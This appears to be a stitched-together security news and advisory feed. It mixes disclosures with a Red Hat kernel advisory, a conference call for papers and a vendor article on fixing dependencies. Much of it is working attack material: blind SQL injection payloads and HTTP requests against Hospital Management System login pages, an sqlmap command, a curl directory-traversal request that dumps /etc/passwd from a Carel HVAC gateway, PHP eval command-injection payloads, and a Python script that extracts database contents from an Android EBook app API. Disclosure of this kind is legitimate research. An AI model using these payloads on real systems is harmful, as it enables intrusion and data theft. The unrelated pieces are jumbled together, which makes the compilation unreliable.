Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at orders.php.

The editid parameter in the orders.php page appears to be vulnerable to SQL injection attacks.

    Parameter: editid (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: editid=1' AND (SELECT 7774 FROM (SELECT(SLEEP(5)))puHE) AND 'zVYe'='zVYe
    

    GET /hms/orders.php?editid=1 HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1

CVE-2022-32095: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-4

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the loginid parameter at doctorlogin.php.

****Hospital-Management-System v1.0-SQLi-3******Vendor**

**Description:**

The vulnerability page is doctorlogin.php

http://your-ip/hms/doctorlogin.php

Hospital-Management-System v1.0

The loginid parameter in the doctorlogin.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

python sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

\[+\] Payloads:

    Parameter: loginid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: loginid=test' AND (SELECT 1110 FROM (SELECT(SLEEP(5)))pvXE) AND 'crsy'='crsy&password=test123&submit=Login
    

\[+\]POST request package

    POST /hms/doctorlogin.php HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 42
    Origin: http://192.168.74.136
    Connection: close
    Referer: http://192.168.74.136/hms/doctorlogin.php
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1
    
    loginid=test&password=test123&submit=Login
    

**In action:**

**Proof and Exploit:**

example2.mp4

CVE-2022-32094: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-3

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the loginid parameter at adminlogin.php.

The loginid parameter in the adminlogin.php page appears to be vulnerable to SQL injection attacks.

    Parameter: loginid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: loginid=admin' AND (SELECT 9671 FROM (SELECT(SLEEP(5)))YbRn) AND 'GZcK'='GZcK&password=admin123&submit=Login
    

    POST /hms/adminlogin.php HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44
    Origin: http://192.168.74.136
    Connection: close
    Referer: http://192.168.74.136/hms/adminlogin.php
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1
    
    loginid=admin&password=admin123&submit=Login

CVE-2022-32093: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-2

Cross Site Scripting (XSS) vulnerability in FusionPBX 4.5.26 allows remote unauthenticated users to inject arbitrary web script or HTML via an unsanitized "path" parameter in resources/login.php.

CVE-2021-37524: Login - FusionPBX

Carel pCOWeb HVAC BACnet Gateway version 2.1.0 suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the file GET parameter through the logdownload.cgi bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

  
Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal

Vendor: CAREL INDUSTRIES S.p.A.  
Product web page: https://www.carel.com  
Affected version: Firmware: A2.1.0 - B2.1.0  
                  Application Software: 2.15.4A  
                  Software version: v16 13020200

Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R  
applications and systems. It consists of programmable controllers, user interfaces,  
gateways and communication interfaces, remote management systems to offer the OEMs  
working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced  
to the more widely-used Building Management Systems, and can also be integrated into  
proprietary supervisory systems.

Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.  
Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script  
is not properly verified before being used to download log files. This can be exploited  
to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

=======================================================================================  
/usr/local/www/usr-cgi/logdownload.cgi:  
---------------------------------------

01: #!/bin/bash  
02:  
03: if [ "$REQUEST_METHOD" = "POST" ]; then  
04:         read QUERY_STRING  
05:         REQUEST_METHOD=GET  
06:         export REQUEST_METHOD  
07:         export QUERY_STRING  
08: fi  
09:  
10: LOGDIR="/usr/local/root/flash/http/log"  
11:  
12: tmp=${QUERY_STRING%"$"*}  
13: cmd=${tmp%"="*}  
14: if [ "$cmd" = "dir" ]; then  
15:         PATHCURRENT=$LOGDIR/${tmp#*"="}  
16: else  
17:         PATHCURRENT=$LOGDIR  
18: fi  
19:  
20: tmp=${QUERY_STRING#*"$"}  
21: cmd=${tmp%"="*}  
22: if [ "$cmd" = "file" ]; then  
23:         FILECURRENT=${tmp#*"="}  
24: else  
25:         if [ -f $PATHCURRENT/lastlog.csv.gz ]; then  
26:                 FILECURRENT=lastlog.csv.gz  
27:         else  
28:                 FILECURRENT=lastlog.csv  
29:         fi  
30: fi  
31:  
32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then  
33:         echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n"  
34:         cat carel.inc.html  
35:         echo "<center>File not available!</center>"  
36:         cat carel.bottom.html  
37:         exit  
38: fi  
39:  
40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then  
41:         if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then  
42:                 if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then  
43:                         echo -ne "Content-Type: text/csv\r\n"  
44:                 else  
45:                         echo -ne "Content-Type: image/svg+xml\r\n"  
46:                 fi  
47:         else  
48:                 echo -ne "Content-Type: image/bmp\r\n"  
49:         fi  
50: else  
51:         echo -ne "Content-Type: application/x-gzip\r\n"  
52: fi  
53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n"  
54:  
55: cat $PATHCURRENT/$FILECURRENT

=======================================================================================

Tested on: GNU/Linux 4.11.12 (armv7l)  
           thttpd/2.29

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5709  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php

10.05.2022

--

$ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/false  
bin:x:2:2:bin:/bin:/bin/false  
sys:x:3:3:sys:/dev:/bin/false  
sync:x:4:100:sync:/bin:/bin/sync  
mail:x:8:8:mail:/var/spool/mail:/bin/false  
www-data:x:33:33:www-data:/var/www:/bin/false  
operator:x:37:37:Operator:/var:/bin/false  
nobody:x:65534:65534:nobody:/home:/bin/false  
guest:x:502:101::/home/guest:/bin/bash  
carel:x:500:500:Carel:/home/carel:/bin/bash  
http:x:48:48:HTTP users:/usr/local/www/http:/bin/false  
httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash  
sshd:x:1000:1001:SSH drop priv user:/:/bin/false

Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal

Several PHP compatibility libraries contain a potential remote code execution flaw in their json_decode() function based on having copy pasted existing vulnerable code. Affected components include the WassUp Realtime analytics WordPress plugin, AjaXplorer Core, and more.

    JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function===============================================================================Several PHP compatability libraries contain a potential remote codeexecutionflaw in their `json_decode()` function based on having copy pasted existingvulnerable code.Identifiers--------------------------------------- * JAHx221 - http://www.justanotherhacker.com/advisories/JAHx221.txtAffected components--------------------------------------- * WassUp Realtime analytics wordpress plugin/compat library -https://wordpress.org/plugins/wassup/ * AjaXplorer Core -https://pydio.com/en/community/releases/pydio-core/ajaxplorer-core-503-released * FlexoCMS - https://github.com/flexocms/flexo1.source * Various code -https://github.com/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code * compat_functions.php - http://techfromhel.comDescription---------------------------------------This appears to date back to a compatability library published in 2010 andappears in several code bases, with no, or a few variations.The vulnerable code generally share the following characteristic: * The json_decode function is declared if it does not exist * some str_replace occurs to transform the json representation to PHP * eval($out)Since `eval()` is turing complete, it is generally considered unsafe to useiton user controlled or user influenced data, however it is unclear ifpracticalexploitation would be possible due to the likely presence of an existing json_decode function.```php/** * compat_functions.php * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for *   backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively * @author: Helene D. <http://techfromhel.com> * @version: 0.3 - 2010-09-13 * @since Wassup 1.8 *//** * Convert simple JSON data into a PHP object (default) or associative *   array. Emulates 'json_decode' function from PHP 5.2+ * @author: Helene Duncker <http://techfromhel.com> * @param string,boolean * @return (array or object) */if (!function_exists('json_decode')) {function json_decode($json,$to_array=false) {$x=false;if (!empty($json) && strpos($json,'{"')!==false) {$out ='$x='.str_replace(array('{','":','}'),array('array(','"=>',')'),$json);eval($out.';');if (!$to_array) $x = (object) $x;}return $x;} //end function json_decode}```Proof of Concept---------------------------------------The eval can be exploited a number of ways, both via full or partialcontrol of the json string:```php/* Payload`id`;//{"*/json_decode('`id`;//{"');```or partially controlled content:```php/* Payload{"key":"value");echo `id`;//"}*/json_decode('{"key":"value");echo `id`;//"}');```Credit---------------------------------------Eldar "Wireghoul" MarcussenSolution---------------------------------------Ensure json_decode is present as a native function for your PHPinstallation.

PHP Library Remote Code Execution

The call for papers for Hardwear.io NL 2022 is now open. It will take place October 27th through the 28th, 2021 in the Netherlands.

    *🐞 CFP for Hardwear.io NL 2022 is OPEN!*If you have groundbreaking embedded research or an awesome open-source toolyou’d like to showcase before the global hardware security community, thisis your chance. Send in your ideas on various hardware subjects, includingbut not limited to Chips, Processors, ICS/SCADA, Telecom, Protocols &Cryptography.CFP is open until: 15 August 2022Conference: 27-28 October 2022, The Hague (NL)✅ SUBMIT your research: https://hardwear.io/netherlands-2022/cfp.php➡️ Suggested Topics:Smart cards: identification, access controls, pay-TVIoT devices: automotive, medical, mobile payment, mobile-connected devicesTrusted computing: mobile TPM, Trusted Execution EnvironmentsEmbedded systems: Firmware, operating systems, memory, virtual machinesTrojans and backdoors: Counterfeit Detection and preventionAttacks and countermeasures:Side-channel, Fault Injection, EMFI, Tempest attacks and countermeasuresReverse engineering, (anti-)cloning, (anti-)tampering, (anti-)counterfeiting➡️ Questions? cfp@hardwear.ioWe look forward to seeing you at Hardwear.io NL 2022. Good luck!Team Hardwear.io <http://hardwear.io/>

Hardwear.io NL 2022 Call For Papers

Red Hat Security Advisory 2022-5476-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include buffer overflow, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2022:5476-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5476  
Issue date:        2022-06-30  
CVE Names:         CVE-2022-1966 CVE-2022-27666  
====================================================================  
1. Summary:

An update is now available for Red Hat Enterprise Linux 8.2 Extended Update  
Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: a use-after-free write in the netfilter subsystem can lead to  
privilege escalation to root (CVE-2022-1966)

* kernel: buffer overflow in IPsec ESP transformation code (CVE-2022-27666)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2061633 - CVE-2022-27666 kernel: buffer overflow in IPsec ESP transformation code  
2092427 - CVE-2022-1966 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_60_2-1-7.el8_2.src.rpm  
kpatch-patch-4_18_0-193_64_1-1-6.el8_2.src.rpm  
kpatch-patch-4_18_0-193_65_2-1-5.el8_2.src.rpm  
kpatch-patch-4_18_0-193_68_1-1-5.el8_2.src.rpm  
kpatch-patch-4_18_0-193_70_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_71_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_75_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_79_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_80_1-1-1.el8_2.src.rpm  
kpatch-patch-4_18_0-193_81_1-1-1.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_60_2-1-7.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_60_2-debuginfo-1-7.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_60_2-debugsource-1-7.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_64_1-1-6.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_64_1-debuginfo-1-6.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_64_1-debugsource-1-6.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_65_2-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_65_2-debuginfo-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_65_2-debugsource-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_68_1-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_68_1-debuginfo-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_68_1-debugsource-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_70_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_70_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_70_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_71_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_71_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_71_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_75_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_75_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_75_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_79_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_79_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_79_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_80_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_80_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_80_1-debugsource-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-debugsource-1-1.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_60_2-1-7.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_60_2-debuginfo-1-7.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_60_2-debugsource-1-7.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_64_1-1-6.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_64_1-debuginfo-1-6.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_64_1-debugsource-1-6.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_65_2-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_65_2-debuginfo-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_65_2-debugsource-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_68_1-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_68_1-debuginfo-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_68_1-debugsource-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_70_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_70_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_70_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_71_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_71_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_71_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_75_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_75_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_75_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_79_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_79_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_79_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_80_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_80_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_80_1-debugsource-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-debugsource-1-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1966  
https://access.redhat.com/security/cve/CVE-2022-27666  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYr6VudzjgjWX9erEAQgleQ//do3fDX6RmgU7qccs6u3sV4qZlUtrJe3q  
Km5tPK0NcI0itlk9iAjYh8nnDOf9GMxqa0Be1rXNskr4003ygQYliIBQmq3C9tpc  
Enp6ocqrMKYtlYMRyaXrGaz+0zFKpsrahW93qfY+2iP0PKMKvJC4r4+qU02SXCfH  
bUl3XyTAOO1qg5MqonGQ7T/ZdR4If7mESEPgDCx5ic9XvOc80zfJhfBX6smFC7xa  
XNrRkKVVJbToZ75mbCULWgWP3l3Mf/iElsk3fShuGwHiKi6vkyNX8zsjp02o6o3w  
qhHU4m8aonYrO+VKCpwnH/X2KkWVTYNSYelQBSoBCh3XOvpanNikw6EufZf3CycS  
9pcbd0akw7a2riahrrpmCQ2adLNbv96K6Adc9cWlLd2/SMy37X7TspVXa8h+vuBz  
InzbIiOyCGEFXu05SwoSH5j9M9dSbcWPDXDURdpfxLAZOccblhI/t/QOeEdFVwVK  
u8fpVcsSkiWTV+xKOUOUGyZnKEHX0wJNoNoP1uiplcZQM/sOGLJ2blpSIkGHb4KS  
q+16A7wHGpveRIu5pmYMMlj2We4X01gn60NUzNugiqlBdhrllVRxZP7TwK1r+7Jj  
zeh5Hs4v1EabxE7VEXTMGlkps8BZFlOwa/G7ECsCc8fnAd9HavPHsT2jpHPbiCK8  
b7ds3h84oX4=vnBR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5476-01

Fixing indirect vulnerabilities is one of those complex, tedious and, quite frankly, boring tasks that no one really wants to touch. No one except for Debricked, it seems. Sure, there are lots of ways to do it manually, but can it be done automatically with minimal risk of breaking changes? The Debricked team decided to find out. 
A forest full of fragile trees
So, where do you even start?

_Fixing indirect vulnerabilities is one of those complex, tedious and, quite frankly, boring tasks that no one really wants to touch. No one except for_ _Debricked__, it seems. Sure, there are lots of ways to do it manually, but can it be done automatically with minimal risk of breaking changes? The Debricked team decided to find out._

**A forest full of fragile trees**

So, where do you even start?

Firstly, there needs to be a way to fix the vulnerability, which, for indirect dependencies, is no walk in the park. Secondly, it needs to be done in a safe way, or, without anything breaking.

You see, indirect dependencies are introduced deep down the dependency tree and it's very tricky to get to the exact version you want. As Debricked's Head of R&D once put it, "_You are turning the knobs by playing around with your direct dependencies and praying to Torvalds that the correct indirect packages are resolved. When Torvalds is in your favour, you have to sacrifice some cloud storage to uncle Bob to make sure the updates don't break your application_."

In other words, there really should be an easier, less stressful, way to do it.

In this article, we'll walk you through how solving transitive vulnerabilities can be done manually and, towards the end, show you the Debricked solution, which allows you to do it automatically. _If you're really just interested in the solution, I suggest you start scrolling_.

**Precision surgery on your dependency tree**

During the research phase of the graph-database project, or, how Debricked today fixes your open source vulnerabilities at the speed of light, the team stumbled upon some articles explaining how to fix indirect vulnerabilities in NPM.

As stated in the article, the \`minimist\` package is affected by vulnerabilities, namely CVE-2021-44906 and CVE-2020-7598.

These are both "Prototype Pollution" vulnerabilities, meaning that arguments are not properly sanitized. Luckily, the maintainers of \`minimist\` fixed these vulnerabilities in version 1.2.6.

Unfortunately, \`mocha\` version 7.1.0 resolves \`minimist\` 0.0.8, which is within the vulnerable range of these vulnerabilities. As suggested by the author of this article, these vulnerabilities can be fixed in a few different ways.

**But! What about breaking changes?**

The first suggestion is to simply trigger an update of all "indirect dependencies", meaning that we won't actually change the version of \`mocha\`. To perform this update, simply run \`npm update\`, delete your \`npm.lock\` file, and run \`npm install\`. This regenerates the dependency tree with the latest possible version (according to constraints) of your indirect dependencies. With this method, the risk of breaking changes is very low as you actually don't update any of your root dependencies, just your indirect ones.

Breaking changes occur when the package functionality or interface is not forward compatible, meaning that an update to the package could cause your application to break. Common breaking changes are class/function-removal, change of arguments to a function, or licence-change (watch out for that one!).

But life is not always this easy, and this simple update of the tree will not solve the vulnerability. The problem is that \`mkdirp\` has actually locked their version of \`minimist\` to 0.0.8. This means that the contributors of \`mkdirp\` have come to the conclusion that they are not compatible with newer versions of \`minimist\`, and forcing the update of \`minimist\` may introduce breaking changes between \`mkdirp\` and \`minimist\`.

**Think… graphs!**

So, the million-dollar question is: what version of \`mocha\` should be used, that in turn trickles down to a safe version of \`minimist\` without breaking the dependency tree? This is actually a graph problem, which has been described in this article.

What graph algorithm would solve this problem? How NPM resolves dependencies can be a bit complicated, as they are allowed to "split" the dependency tree. This means that they can have multiple versions of one dependency to make sure that we always have a tree that is compatible. To solve the vulnerability, we need to make sure that all instances of \`minimist\` are safe by updating all roots that can trickle down to \`minimist\`.

The algorithm used to solve this problem is called "All Max Paths Safe". By walking down the dependency graph and keeping the max versions, all while pruning all other versions of that package in each intersection, we can create an approximate representation of our dependency tree. If the approximation is safe, that means that our real tree will be safe as well!

By performing this algorithm for all potential versions of \`mocha\`, we find the smallest upgrade to fix this vulnerability. To get the speed we wanted for this algorithm, the team had to build a custom Neo4j procedure, which can handle searching over 100 root versions with a search depth of 30+ in ~150 milliseconds. Speedy, huh?

In this case, we don't have to search very far… as 7.1.1 of \`mocha\` is safe! This is only a patch update, which indicates that the risk of breaking changes is very low. For less complex cases (like this example), 'npm audit' can help you with their fantastic 'npm audit fix' command.

**Don't be ad-hoc, enter the pub-sub-human way of working!**

Now, if you got this far (congratulations, very impressive) and thought, "this sounds really complex and like an awful lot of work," don't worry - you're not the only one. Luckily, all this happens completely automatically in the Debricked tool when clicking this little button:

As of right now, this is available for Javascript. Soon, the support will be extended to Java, Golang, C#, Python and PHP.

If you're not yet a Debricked user, what are you waiting for? It's free for single devs, smaller teams and open source projects (and if you're a larger organization, fear not. There's a generous free trial). Sign up for free here.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Solving the indirect vulnerability enigma - fixing indirect vulnerabilities without breaking your dependency tree

SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author_id parameter to api.php.

\[+\] Title: Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) \[+\] Author: veyselxan \[+\] Vendor Homepage:https://codecanyon.net/user/viaviwebtech \[+\] Tested on: Windows 10 \[+\] Versions: 10 \[+\] Vulnerability Type: SQL injection \[+\] Vulnerable Parameter: "author\_id" \[+\] Vulnerable File: api.php \[+\] Cve:CVE-2021-32428 SQL Injection vulnerability in viaviwebtech Android EBook App (Books App, PDF, ePub, Online Book Reading, Download Books) 10 via the author\_id parameter to api.php. # PoC: #!/usr/bin/python3 import requests >> import sys import string url = sys.argv\[1\]+"api.php" >> listler = list() def exploit(xa,i): database = {'data': >> '{"package\_name" : >> "com.example.test","salt":"123456","sign":"7cbf2e8809bf2f671470469ec252acea","method\_name":"get\_author\_details","author\_id":"1\\' >> AND substring(database(),'+str(i)+',1)=\\''+str(xa)+'\\'-- >> veyselxan"}'} x = requests.post(url, data = database) a = >> x.json() if a\['status'\]==1: listler.append(xa) i = 1 >> yazilara = list(string.ascii\_lowercase) while i < 16: for x >> in yazilara: exploit(x,i) i += 1 print(\*listler, sep = "")

Tag

#php